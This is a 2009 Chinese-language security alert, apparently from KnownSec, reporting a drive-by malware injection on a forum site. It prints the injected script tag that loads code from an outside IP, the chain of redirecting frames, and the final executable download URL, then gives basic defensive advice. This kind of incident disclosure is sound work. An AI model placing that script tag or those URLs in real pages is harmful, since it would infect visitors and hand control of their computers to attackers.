网友世界被植入恶意代码

发布时间：Sun Jul 12 2009 00:00:44 UTC+0800
最后更新时间：Sun Jul 12 2009 00:00:44 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 网友世界（http://bbs.netfriends.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装***病毒等恶意程序,能够致使电脑被***控制而且被窃取敏感信息。

MalUrl:http://bbs.netfriends.com.cn/

网页被嵌入恶意连接代码：
<script src=http://219.159.68.185/cnzz.js></script>
挂马分析：
[wide]http://bbs.netfriends.com.cn/
 [script]http://219.159.68.185/cnzz.js
  [frame]http://xmznb.9966.org/3/3.htm?
   [frame]http://xmznb.9966.org/3/lo.jpg
   [frame]http://xmznb.9966.org/3/yl.htm
    [frame]http://xmznb.9966.org/3/xm14.htm
    [frame]http://xmznb.9966.org/3/z.htm
    [frame]http://xmznb.9966.org/3/ctvod.htm
    [frame]http://xmznb.9966.org/3/of.htm
    [frame]http://xmznb.9966.org/3/ctxxz.htm
    [frame]http://xmznb.9966.org/3/ctqm.htm
    [frame]http://xmznb.9966.org/3/ctlb.htm
    [frame]http://xmznb.9966.org/3/ct122121.htm
   [script]http://js.tongji.linezing.com/1190488/tongji.js
   [script]http://js.users.51.la/2825805.js
  [frame]http://xmznb.9966.org/3/3.htm?
  [frame]http://xmznb.9966.org/3/3.htm?
  [frame]http://xmznb.9966.org/3/3.htm?
最终下载病毒文件：
http://ylzf002.cn/b/3.exe

经过执行以上病毒文件，来达到彻底控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的断定：安全

知道安全提醒网民，要作好安全防御，避免因网络安全问题影响您正常的生活和工做。若是您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心： http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

咱们很乐意他人使用咱们的工做成果，若是使用咱们数据的请通知咱们一下，咱们将十分感谢。

若是您有技术方面的问题或者须要技术咨询能够经过如下方式联系咱们：
邮箱： sec@knownsec.com或 sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com